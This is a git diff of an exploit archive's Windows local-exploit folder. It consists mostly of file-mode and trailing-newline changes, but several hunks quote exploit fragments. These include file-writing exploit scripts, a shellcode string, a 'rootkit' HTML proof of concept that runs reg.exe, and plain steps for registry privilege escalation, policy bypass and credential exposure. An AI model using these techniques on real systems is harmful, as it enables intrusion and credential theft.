a/platforms/windows/local/10745.c b/platforms/windows/local/10745.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/1085.c b/platforms/windows/local/1085.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/1086.c b/platforms/windows/local/1086.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/1091.c b/platforms/windows/local/1091.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/10936.c b/platforms/windows/local/10936.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/11139.c b/platforms/windows/local/11139.c old mode 100755 new mode 100644 index fda07294c..8a84313b4 --- a/platforms/windows/local/11139.c +++ b/platforms/windows/local/11139.c @@ -517,5 +517,4 @@ Stack: void print(char* msg) { printf("\n[*]%s\n",msg); - } - \ No newline at end of file + } \ No newline at end of file diff --git a/platforms/windows/local/11174.c b/platforms/windows/local/11174.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/11199.txt b/platforms/windows/local/11199.txt old mode 100755 new mode 100644 index 513971c8f..0d14ff48b --- a/platforms/windows/local/11199.txt +++ b/platforms/windows/local/11199.txt @@ -279,4 +279,4 @@ ucq5EOcRsfAAWW3O8EbzQa0NiHHScJrKDjvg0gX1Y69MBBwCLNP6yg== -- ------------------------------------- tavisosdf.lonestar.org | finger me for my gpg key. -------------------------------------------------------- \ No newline at end of file +------------------------------------------------------- \ No newline at end of file diff --git a/platforms/windows/local/11229.txt b/platforms/windows/local/11229.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/11232.c b/platforms/windows/local/11232.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/1128.c b/platforms/windows/local/1128.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/11281.c b/platforms/windows/local/11281.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/11315.c b/platforms/windows/local/11315.c old mode 100755 new mode 100644 index 4ea4b2b9b..c5b6971c0 --- a/platforms/windows/local/11315.c +++ b/platforms/windows/local/11315.c @@ -265,4 +265,4 @@ void gen_random(char *s, const int len) void print(char* msg) { printf("[*]%s\n",msg); - } \ No newline at end of file + } \ No newline at end of file diff --git a/platforms/windows/local/11317.c b/platforms/windows/local/11317.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/11331.txt b/platforms/windows/local/11331.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/11372.c b/platforms/windows/local/11372.c old mode 100755 new mode 100644 index 3ed69cc56..fbe09a339 --- a/platforms/windows/local/11372.c +++ b/platforms/windows/local/11372.c @@ -7108,4 +7108,4 @@ void printshell(); void print(char* msg) { printf("[*]%s\n",msg); - } \ No newline at end of file + } \ No newline at end of file diff --git a/platforms/windows/local/11379.c b/platforms/windows/local/11379.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/11475.txt b/platforms/windows/local/11475.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/11573.c b/platforms/windows/local/11573.c old mode 100755 new mode 100644 index eb139f0cc..3f0f69815 --- a/platforms/windows/local/11573.c +++ b/platforms/windows/local/11573.c @@ -263,4 +263,4 @@ "* *\n" "* *\n" "***************************************************************************\n"; - printf("%s",h);} \ No newline at end of file + printf("%s",h);} \ No newline at end of file diff --git a/platforms/windows/local/1161.c b/platforms/windows/local/1161.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/11663.txt b/platforms/windows/local/11663.txt old mode 100755 new mode 100644 index 1657a7414..76dc76575 --- a/platforms/windows/local/11663.txt +++ b/platforms/windows/local/11663.txt @@ -53,4 +53,4 @@ myobject.run("reg.exe"+" copy "+uri+"\\backup "+uri+" /f "); <h1>Lenovo Access Connection Exploite POC<h1> <button onclick="install()">Install RootKit</button><P><button onclick="remove()">Remove RootKit</button> </body></html> ----------code ends here------------ \ No newline at end of file +---------code ends here------------ \ No newline at end of file diff --git a/platforms/windows/local/1168.c b/platforms/windows/local/1168.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/1173.c b/platforms/windows/local/1173.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/1174.c b/platforms/windows/local/1174.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/11786.txt b/platforms/windows/local/11786.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/11794.c b/platforms/windows/local/11794.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/11909.txt b/platforms/windows/local/11909.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/1197.c b/platforms/windows/local/1197.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/11976.php b/platforms/windows/local/11976.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/1198.c b/platforms/windows/local/1198.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/12012.txt b/platforms/windows/local/12012.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/12024.php b/platforms/windows/local/12024.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/12051.php b/platforms/windows/local/12051.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/12189.php b/platforms/windows/local/12189.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/122.c b/platforms/windows/local/122.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/12213.c b/platforms/windows/local/12213.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/12379.php b/platforms/windows/local/12379.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/12497.c b/platforms/windows/local/12497.c old mode 100755 new mode 100644 index 3b65ce97d..eed5aea6d --- a/platforms/windows/local/12497.c +++ b/platforms/windows/local/12497.c @@ -135,5 +135,4 @@ s[i]=alphanum[rand()%(sizeof(alphanum)-1)]; } s[len]=0; - } - \ No newline at end of file + } \ No newline at end of file diff --git a/platforms/windows/local/12501.php b/platforms/windows/local/12501.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/12677.html b/platforms/windows/local/12677.html old mode 100755 new mode 100644 diff --git a/platforms/windows/local/12710.c b/platforms/windows/local/12710.c old mode 100755 new mode 100644 index b40fabd9b..2f81100d4 --- a/platforms/windows/local/12710.c +++ b/platforms/windows/local/12710.c @@ -281,8 +281,4 @@ printf("OK!\n "); getchar(); return 0; -} - - - - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/local/12803.html b/platforms/windows/local/12803.html old mode 100755 new mode 100644 diff --git a/platforms/windows/local/13767.c b/platforms/windows/local/13767.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/13806.txt b/platforms/windows/local/13806.txt old mode 100755 new mode 100644 index 51c837e84..ce667f036 --- a/platforms/windows/local/13806.txt +++ b/platforms/windows/local/13806.txt @@ -34,4 +34,4 @@ print "\n"; print " Espere Mientras Trabaja el Exploit\n"; my $fruty="\x87" x 999999999; my $loops="\x67" x 999999999; -my $shellcode="\x00\x13\xFF\xC4\x00\x10\x0a\xe4\x00\x08\x5b\x5d"; \ No newline at end of file +my $shellcode="\x00\x13\xFF\xC4\x00\x10\x0a\xe4\x00\x08\x5b\x5d"; \ No newline at end of file diff --git a/platforms/windows/local/13940.pl b/platforms/windows/local/13940.pl index 5d9c699bd..1d62eb173 100755 --- a/platforms/windows/local/13940.pl +++ b/platforms/windows/local/13940.pl @@ -48,4 +48,4 @@ open(my $c_h,">> exploit.ov"); print $c_h $exploit; close $c_h; -print "File wuz created successfully!"; \ No newline at end of file +print "File wuz created successfully!"; \ No newline at end of file diff --git a/platforms/windows/local/1403.c b/platforms/windows/local/1403.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/1404.c b/platforms/windows/local/1404.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/1406.php b/platforms/windows/local/1406.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/1407.c b/platforms/windows/local/1407.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14092.c b/platforms/windows/local/14092.c old mode 100755 new mode 100644 index ccecc621c..2a30aa212 --- a/platforms/windows/local/14092.c +++ b/platforms/windows/local/14092.c @@ -6416,4 +6416,4 @@ void error_handle(void){ perror("\nError"); exit(1); - } \ No newline at end of file + } \ No newline at end of file diff --git a/platforms/windows/local/14215.txt b/platforms/windows/local/14215.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14256.txt b/platforms/windows/local/14256.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14403.txt b/platforms/windows/local/14403.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14464.pl b/platforms/windows/local/14464.pl index b697857ba..fdbb696d2 100755 --- a/platforms/windows/local/14464.pl +++ b/platforms/windows/local/14464.pl @@ -64,4 +64,4 @@ print($FILE $junk.$eip.$nop.$sec); close($FILE); -print("exploit created successfully"); \ No newline at end of file +print("exploit created successfully"); \ No newline at end of file diff --git a/platforms/windows/local/14491.txt b/platforms/windows/local/14491.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/1455.txt b/platforms/windows/local/1455.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14566.c b/platforms/windows/local/14566.c old mode 100755 new mode 100644 index 49e4a67ba..435889d88 --- a/platforms/windows/local/14566.c +++ b/platforms/windows/local/14566.c @@ -1,6 +1,5 @@ -source: http://www.ragestorm.net/blogs/?p=255 -source: http://secunia.com/advisories/40870/ - +//source: http://www.ragestorm.net/blogs/?p=255 +//source: http://secunia.com/advisories/40870/ DEVMODE dm = {0}; dm.dmSize = sizeof(DEVMODE); diff --git a/platforms/windows/local/14576.c b/platforms/windows/local/14576.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14610.txt b/platforms/windows/local/14610.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/1465.c b/platforms/windows/local/1465.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/1470.c b/platforms/windows/local/1470.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14721.c b/platforms/windows/local/14721.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14723.c b/platforms/windows/local/14723.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14726.c b/platforms/windows/local/14726.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14728.c b/platforms/windows/local/14728.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14730.c b/platforms/windows/local/14730.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14731.c b/platforms/windows/local/14731.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14732.c b/platforms/windows/local/14732.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14733.c b/platforms/windows/local/14733.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14734.c b/platforms/windows/local/14734.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14735.c b/platforms/windows/local/14735.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14739.c b/platforms/windows/local/14739.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14740.c b/platforms/windows/local/14740.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14741.c b/platforms/windows/local/14741.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14743.c b/platforms/windows/local/14743.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14744.c b/platforms/windows/local/14744.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14745.c b/platforms/windows/local/14745.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14746.c b/platforms/windows/local/14746.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14747.c b/platforms/windows/local/14747.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14748.txt b/platforms/windows/local/14748.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14750.txt b/platforms/windows/local/14750.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14751.txt b/platforms/windows/local/14751.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14752.c b/platforms/windows/local/14752.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14753.c b/platforms/windows/local/14753.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14754.txt b/platforms/windows/local/14754.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14755.c b/platforms/windows/local/14755.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14756.c b/platforms/windows/local/14756.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14758.c b/platforms/windows/local/14758.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14762.c b/platforms/windows/local/14762.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14764.c b/platforms/windows/local/14764.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14765.c b/platforms/windows/local/14765.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14766.c b/platforms/windows/local/14766.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14768.c b/platforms/windows/local/14768.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14769.c b/platforms/windows/local/14769.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14771.c b/platforms/windows/local/14771.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14772.c b/platforms/windows/local/14772.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14773.c b/platforms/windows/local/14773.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14774.c b/platforms/windows/local/14774.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14775.c b/platforms/windows/local/14775.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14778.c b/platforms/windows/local/14778.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14780.c b/platforms/windows/local/14780.c old mode 100755 new mode 100644 index 5249ba3d8..052fb52eb --- a/platforms/windows/local/14780.c +++ b/platforms/windows/local/14780.c @@ -21,7 +21,4 @@ BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { alpdaemon(); return 0; -} - - - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/local/14781.c b/platforms/windows/local/14781.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14782.c b/platforms/windows/local/14782.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14783.c b/platforms/windows/local/14783.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14784.c b/platforms/windows/local/14784.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14785.c b/platforms/windows/local/14785.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14786.c b/platforms/windows/local/14786.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14787.c b/platforms/windows/local/14787.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14788.c b/platforms/windows/local/14788.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14789.c b/platforms/windows/local/14789.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14790.c b/platforms/windows/local/14790.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14791.c b/platforms/windows/local/14791.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/14793.c b/platforms/windows/local/14793.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/1490.c b/platforms/windows/local/1490.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/1495.cpp b/platforms/windows/local/1495.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/15022.py b/platforms/windows/local/15022.py index 815f255a7..19ccb0514 100755 --- a/platforms/windows/local/15022.py +++ b/platforms/windows/local/15022.py @@ -74,5 +74,4 @@ buf += ",0,7462,885953024,4,1,640,480\r\n" #Required file text f = open("sploit.ilj", "w") f.write(buf) -f.close() - \ No newline at end of file +f.close() \ No newline at end of file diff --git a/platforms/windows/local/15047.rb b/platforms/windows/local/15047.rb index 191669ad1..e6cfa6489 100755 --- a/platforms/windows/local/15047.rb +++ b/platforms/windows/local/15047.rb @@ -131,4 +131,4 @@ data = head + junk1 + seh + retslide + rop1 + params + rop2 + nops + payload + j File.open("crash.pls", 'w') do |b| b.write data puts "file size : " + data.length.to_s -end \ No newline at end of file +end \ No newline at end of file diff --git a/platforms/windows/local/15184.c b/platforms/windows/local/15184.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/15201.rb b/platforms/windows/local/15201.rb index 4e19e8e35..c00da52c9 100755 --- a/platforms/windows/local/15201.rb +++ b/platforms/windows/local/15201.rb @@ -116,4 +116,4 @@ xploit = junk1 + seh + ret + rop1 + params + rop2 + nops + payload + junk2 File.open("crash.smp", 'w') do |fd| fd.write xploit puts "file size: " + xploit.length.to_s -end \ No newline at end of file +end \ No newline at end of file diff --git a/platforms/windows/local/15376.c b/platforms/windows/local/15376.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/15403.py b/platforms/windows/local/15403.py index 7c555820b..aab12d7ec 100755 --- a/platforms/windows/local/15403.py +++ b/platforms/windows/local/15403.py @@ -40,4 +40,4 @@ try: f.close() print "[+] Vulnerable file created! Place the 'users.txt' file in the Minishare directory and run the program...\n" except: - print "[-] Error occured!" \ No newline at end of file + print "[-] Error occured!" \ No newline at end of file diff --git a/platforms/windows/local/15461.c b/platforms/windows/local/15461.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/1555.c b/platforms/windows/local/1555.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/15575.py b/platforms/windows/local/15575.py index 0fe4b07b2..db8edb459 100755 --- a/platforms/windows/local/15575.py +++ b/platforms/windows/local/15575.py @@ -88,4 +88,4 @@ try: print "\t- File 'users.txt' created..." print "\t- Place the 'users.txt' file in the Minishare directory and run the program...\n" except: - print "\t-Oooops! Can't write file 'users.txt'...\n" \ No newline at end of file + print "\t-Oooops! Can't write file 'users.txt'...\n" \ No newline at end of file diff --git a/platforms/windows/local/15584.txt b/platforms/windows/local/15584.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/15589.wsf b/platforms/windows/local/15589.wsf old mode 100755 new mode 100644 diff --git a/platforms/windows/local/15599.py b/platforms/windows/local/15599.py index 03a764be7..a9ae9e106 100755 --- a/platforms/windows/local/15599.py +++ b/platforms/windows/local/15599.py @@ -108,4 +108,4 @@ try: print "\t- File successfully created..." print "\t- To run exploit open the file exploit.m3u with Xion Audio Player...\n" except: - print "\t-Oooops! Can't write file ...\n" \ No newline at end of file + print "\t-Oooops! Can't write file ...\n" \ No newline at end of file diff --git a/platforms/windows/local/15609.txt b/platforms/windows/local/15609.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/15624.txt b/platforms/windows/local/15624.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/15626.py b/platforms/windows/local/15626.py index 1c18bc7fe..12713392b 100755 --- a/platforms/windows/local/15626.py +++ b/platforms/windows/local/15626.py @@ -110,4 +110,4 @@ except SystemExit: except ValueError: print "Check again the available options!" except: - print "-Oooops! Can't write file...\n" \ No newline at end of file + print "-Oooops! Can't write file...\n" \ No newline at end of file diff --git a/platforms/windows/local/15630.py b/platforms/windows/local/15630.py index cf2fa61fb..e8c54a063 100755 --- a/platforms/windows/local/15630.py +++ b/platforms/windows/local/15630.py @@ -75,4 +75,4 @@ try: f.close() print " Vulnerable file created!...\n" except: - print "[-] Error occured!" \ No newline at end of file + print "[-] Error occured!" \ No newline at end of file diff --git a/platforms/windows/local/15693.html b/platforms/windows/local/15693.html old mode 100755 new mode 100644 diff --git a/platforms/windows/local/15696.txt b/platforms/windows/local/15696.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/15706.txt b/platforms/windows/local/15706.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/15761.txt b/platforms/windows/local/15761.txt old mode 100755 new mode 100644 index 27c096138..1f33dc651 --- a/platforms/windows/local/15761.txt +++ b/platforms/windows/local/15761.txt @@ -473,8 +473,4 @@ printf("cannot dev ctl %u\n",GetLastError()); return 0 ; } return 0; -} - - - - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/local/15762.txt b/platforms/windows/local/15762.txt old mode 100755 new mode 100644 index 4d3562fe8..ad0d4c495 --- a/platforms/windows/local/15762.txt +++ b/platforms/windows/local/15762.txt @@ -616,7 +616,4 @@ push 2 call pqi } return 0; -} - - - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/local/15763.txt b/platforms/windows/local/15763.txt old mode 100755 new mode 100644 index cf58c86b5..03f84aff4 --- a/platforms/windows/local/15763.txt +++ b/platforms/windows/local/15763.txt @@ -301,7 +301,4 @@ push 0 call p } return 0; -} - - - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/local/15764.txt b/platforms/windows/local/15764.txt old mode 100755 new mode 100644 index 5b6e89c06..2eb7a2a3c --- a/platforms/windows/local/15764.txt +++ b/platforms/windows/local/15764.txt @@ -397,7 +397,4 @@ printf("dev ctrl 2 failed %u\n", GetLastError()); return 0 ; } return 0 ; -} - - - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/local/1584.cpp b/platforms/windows/local/1584.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/15888.c b/platforms/windows/local/15888.c old mode 100755 new mode 100644 index d90633603..9355513ed --- a/platforms/windows/local/15888.c +++ b/platforms/windows/local/15888.c @@ -43,4 +43,4 @@ strcat(exploit, shellcode); WinExec(exploit,0); printf("Exploitation Finished\n"); return 0; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/local/15972.c b/platforms/windows/local/15972.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/15985.c b/platforms/windows/local/15985.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/15994.rb b/platforms/windows/local/15994.rb index fff08dbfc..70b6fb173 100755 --- a/platforms/windows/local/15994.rb +++ b/platforms/windows/local/15994.rb @@ -88,5 +88,4 @@ begin sleep(1) rescue puts "ERROR TO CREATE THE FILE"+file -end - \ No newline at end of file +end \ No newline at end of file diff --git a/platforms/windows/local/16024.txt b/platforms/windows/local/16024.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/16071.txt b/platforms/windows/local/16071.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/16132.htm b/platforms/windows/local/16132.htm old mode 100755 new mode 100644 diff --git a/platforms/windows/local/16133.htm b/platforms/windows/local/16133.htm old mode 100755 new mode 100644 diff --git a/platforms/windows/local/16138.c b/platforms/windows/local/16138.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/16940.c b/platforms/windows/local/16940.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/16991.txt b/platforms/windows/local/16991.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/17158.txt b/platforms/windows/local/17158.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/17196.html b/platforms/windows/local/17196.html old mode 100755 new mode 100644 diff --git a/platforms/windows/local/172.c b/platforms/windows/local/172.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/17362.cpp b/platforms/windows/local/17362.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/17459.txt b/platforms/windows/local/17459.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/17473.txt b/platforms/windows/local/17473.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/17474.txt b/platforms/windows/local/17474.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/17488.txt b/platforms/windows/local/17488.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/17561.c b/platforms/windows/local/17561.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/17715.html b/platforms/windows/local/17715.html old mode 100755 new mode 100644 diff --git a/platforms/windows/local/1772.c b/platforms/windows/local/1772.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/17727.txt b/platforms/windows/local/17727.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/17754.c b/platforms/windows/local/17754.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/17803.php b/platforms/windows/local/17803.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/17817.php b/platforms/windows/local/17817.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/17820.c b/platforms/windows/local/17820.c old mode 100755 new mode 100644 index ecf312410..cc8f8fe5d --- a/platforms/windows/local/17820.c +++ b/platforms/windows/local/17820.c @@ -239,6 +239,4 @@ int main(int argc, char **argv) } printf("done"); -} - - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/local/17902.c b/platforms/windows/local/17902.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/1806.c b/platforms/windows/local/1806.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/18067.txt b/platforms/windows/local/18067.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/18201.txt b/platforms/windows/local/18201.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/18258.c b/platforms/windows/local/18258.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/18372.txt b/platforms/windows/local/18372.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/18471.c b/platforms/windows/local/18471.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/18533.txt b/platforms/windows/local/18533.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/18681.txt b/platforms/windows/local/18681.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/18808.html b/platforms/windows/local/18808.html old mode 100755 new mode 100644 diff --git a/platforms/windows/local/18823.txt b/platforms/windows/local/18823.txt old mode 100755 new mode 100644 index 331d98fac..469aa9209 --- a/platforms/windows/local/18823.txt +++ b/platforms/windows/local/18823.txt @@ -57,4 +57,4 @@ Fix Information An updated version of the software has been released to address these vulnerabilities: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security -_advisory&pvid=security_advisory&year=2012&suid=20120124_00 \ No newline at end of file +_advisory&pvid=security_advisory&year=2012&suid=20120124_00 \ No newline at end of file diff --git a/platforms/windows/local/18862.php b/platforms/windows/local/18862.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/18892.txt b/platforms/windows/local/18892.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/18981.txt b/platforms/windows/local/18981.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/1910.c b/platforms/windows/local/1910.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/1911.c b/platforms/windows/local/1911.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19138.txt b/platforms/windows/local/19138.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19143.c b/platforms/windows/local/19143.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19144.txt b/platforms/windows/local/19144.txt old mode 100755 new mode 100644 index b22c61837..f4a48d425 --- a/platforms/windows/local/19144.txt +++ b/platforms/windows/local/19144.txt @@ -8,4 +8,4 @@ Open Word or Excel. Select File:Open. Right click on the background of the File:Open window. A prompt will appear that will allow the user to select "Browse". Browse will open Windows Explorer. -Assuming the user has write access to the temp directory, create a special directory in temp and copy in the executables of the forbidden applications to this directory. These applications can now be executed and will circumvent the policies established by ZAK. \ No newline at end of file +Assuming the user has write access to the temp directory, create a special directory in temp and copy in the executables of the forbidden applications to this directory. These applications can now be executed and will circumvent the policies established by ZAK. \ No newline at end of file diff --git a/platforms/windows/local/19145.c b/platforms/windows/local/19145.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19167.txt b/platforms/windows/local/19167.txt old mode 100755 new mode 100644 index 98e2690f4..2fb6c02a8 --- a/platforms/windows/local/19167.txt +++ b/platforms/windows/local/19167.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/218/info Non-administrative Imail and WS_FTP Server users may elevate their privileges to administrator for these applications by modifying a specific registry value. Once a person has obtained administrative privileges, they may use the application interface (locally) to read email, create accounts, delete accounts, etc. Access the following registry key "HKEY_LOCAL_MACHINE\SOFTWARE\Ipswitch\IMail\Domains\Machine_name\Users\Username" -Modify the Flag value to read "1920". 1920 gives the user account administrator permissions to IMail and WS_FTP Server. \ No newline at end of file +Modify the Flag value to read "1920". 1920 gives the user account administrator permissions to IMail and WS_FTP Server. \ No newline at end of file diff --git a/platforms/windows/local/19192.txt b/platforms/windows/local/19192.txt old mode 100755 new mode 100644 index 6dc6d91f3..b7d983700 --- a/platforms/windows/local/19192.txt +++ b/platforms/windows/local/19192.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/228/info During installation of BackOffice 4.0, a file called reboot.ini is created and stored in the \Program Files\Microsoft BackOffice directory. This file contains clear-text usernames and passwords for several services that may be created during installation. These services include: SQL Executive Logon, Exchange Services, and MTS Remote Administration (and potentially others). The File ACLs for this file are set to Everyone:Full Control. -Clear-text usernames and passwords are stored in the \Program Files\Microsoft BackOffice\Reboot.ini file. \ No newline at end of file +Clear-text usernames and passwords are stored in the \Program Files\Microsoft BackOffice\Reboot.ini file. \ No newline at end of file diff --git a/platforms/windows/local/19195.c b/platforms/windows/local/19195.c old mode 100755 new mode 100644 index 8b11df594..9c91413e2 --- a/platforms/windows/local/19195.c +++ b/platforms/windows/local/19195.c @@ -1,48 +1,55 @@ -source: http://www.securityfocus.com/bid/231/info - - -The HKeyLocalMachine\SECURITY\Policy\Secrets\ key contains obfuscated data for various system services/resources. Clear-text usernames and passwords for services running under the context of a user account, password hashes and usernames for the last ten users to log on to the domain from the local host, domain trust passwords, passwords for web and ftp services, and dial-up networking usernames, passwords and phone numbers can be obtained and "decrypted" from the Policy\Secrets key. - -Must be run with administrative privileges - -run as: prog _sc_schedule [machine], prog nl$1, prog w3_root_data -or any other registry key under NTLM\security\policy\secrets. - -<---begin---> -#include <windows.h> +// source: http://www.securityfocus.com/bid/83/info +// +// APC PowerChute PLUS is a software package that will safely shutdown computer systems locally or accross a network when UPS power starts to fail. When operating PowerChute PLUS normally listens to TCP ports 6547 and 6548, as well as for broadcast requests in UDP port 6549. +// +// A request packet can be craftted and sent to the UDP port such that the upsd server will crash. This is been tested in the Solaris i386 version of 